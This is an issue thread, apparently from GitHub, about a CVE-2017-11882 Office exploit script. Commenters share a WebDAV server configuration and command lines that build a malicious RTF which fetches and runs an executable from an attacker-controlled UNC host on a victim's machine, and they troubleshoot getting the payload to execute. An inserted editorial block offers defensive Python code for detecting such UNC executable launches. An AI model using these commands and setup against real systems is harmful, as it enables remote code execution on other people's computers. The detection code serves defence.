about exploit (cve-2017-11882, open issue)

embedi commented on July 29, 2024
about exploit

from cve-2017-11882.

Comments (8)

isabellah750 commented on July 29, 2024

It seems that it uses a UNC path; according to my understanding, that is a path to a file shared on the network.

Although I am also interested in downloading the file using HTTP.

shellerto commented on July 29, 2024

Hi - I can't run this exploit.
I use this command:
python webdav_exec_CVE-2017-11882.py -u \192.168.1.11\ff\sss.exe -e C:\Windows\system32\calc.exe -o test

and exploit message

but the Word file does not work

kkkkkii commented on July 29, 2024

Hello!

First of all, you will need a properly configured HTTP server with WebDAV support (it's important, obviously) in order to execute an arbitrary binary on the victim's machine. It may be tricky to configure the HTTP server properly. I am using Apache httpd on a CentOS 6 machine. Your setup should support anonymous authentication and file locking. So I have something like this in my httpd.conf:

Alias /dav "/var/www/dav"
<IfModule dav_lock_module>
    DavLockDB "/var/www/dav"
</IfModule>
<Directory "/var/www/dav">
    Header set Access-Control-Allow-Origin "*"
    Dav On
</Directory>

Something may be missing, because now I cannot remember exactly how I configured it.

After you have properly configured the HTTP server, make sure that your WebDAV folder is accessible from the outside and that executable files can be launched from this location, for example with the Win+R shortcut.

WebDAV uses HTTP as transport and can be accessed with a UNC path just like SMB.
That's why you should create the sample exploit file with UNC paths:

python webdav_exec_CVE-2017-11882.py -u \\192.168.1.166\dav -e \\192.168.1.166\dav\1.exe -o test.rtf

In fact, the first UNC path can be just any UNC path which complies with the command length limitation.
It is used to trigger the start of the WebClient service.

If everything is configured right, you can launch your binary on a victim's machine. Hope that helps.
I will update README.md ASAP and close this issue.

from cve-2017-11882.
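
Editorial example added here, not part of the thread or of the repository's code: the comment above relies on a binary being launched straight from a UNC path served over WebDAV, so a defender can flag process-creation records whose command line references an executable on a UNC host, in either slash style that appears in this thread. The record layout, the allow-list and the sample events are constructed assumptions.

```python
import re

# Executable referenced through a UNC path, in either slash style used in the
# thread (\\host\share\x.exe or //host/share/x.exe). The lookbehind skips
# ordinary URLs such as http://host/x.exe; "@port" covers WebDAV port syntax.
UNC_EXE = re.compile(
    r'(?<![:\w\\/])(?:\\\\|//)([\w.\-]+)(?:@[\w@]+)?[\\/]'
    r'([^\s"]+?\.(?:exe|dll|scr|hta|bat|cmd))\b', re.I)

# Office processes that should not start binaries from network paths.
# EQNEDT32.EXE is the Equation Editor component affected by CVE-2017-11882.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
ALLOWED_HOSTS = {"fileserver01"}  # hypothetical internal allow-list

def classify(event):
    """Return (severity, host) for one process-creation record, else None."""
    m = UNC_EXE.search(event["cmdline"])
    if not m or m.group(1).lower() in ALLOWED_HOSTS:
        return None
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    return ("high" if parent in OFFICE_PARENTS else "medium", m.group(1))

# Constructed sample records (not taken from the thread or a real host).
EVENTS = [
    {"parent": r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r"\\198.51.100.7\dav\1.exe"},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "//198.51.100.7/temp/1.exe"},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": r"\\fileserver01\tools\setup.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl.exe -O http://example.test/a.exe"},
]

def findings(events=EVENTS):
    """Classify every record and keep only the flagged ones."""
    return [hit for hit in map(classify, events) if hit]

if __name__ == "__main__":
    for severity, host in findings():
        print(severity, host)
```

An unexpected start of the WebClient service on a workstation, which the comment names as the side effect of the first UNC path, is a second signal worth correlating with these hits.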

backtoback1 commented on July 29, 2024

@kkkkkii

Can you explain that step by step?
I edited the WebDAV and I can access files from another PC,
but with Word it shows me this error:

https://image.prntscr.com/image/fSzsc4ruSCGFv31qxBInPQ.png

kkkkkii commented on July 29, 2024

@backtoback1

According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe \ is considered a special symbol by the shell where you execute this script. If you can run your payload from the Win+R box with the UNC path \\192.168.1.166\webdav\1.exe, then you can do this with the exploit.

isabellah750 commented on July 29, 2024

I am still confused about how it is working.

kalifan commented on July 29, 2024

Hi guys, if for any reason the exploit does not work fine, maybe you must use this: "//" and not "\". I have had this problem.
As seen, when you use Kali Linux the correct way is this:

python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf

Thanks, good job!!

eternal1502 commented on July 29, 2024

Hi, so I connected my local PC to my cPanel through webdisk and, after some trials, I was able to get the exploit to work and execute the payload on my local PC. But when I run the same file on another PC which is not connected to my cPanel webdisk, it does not download the payload.
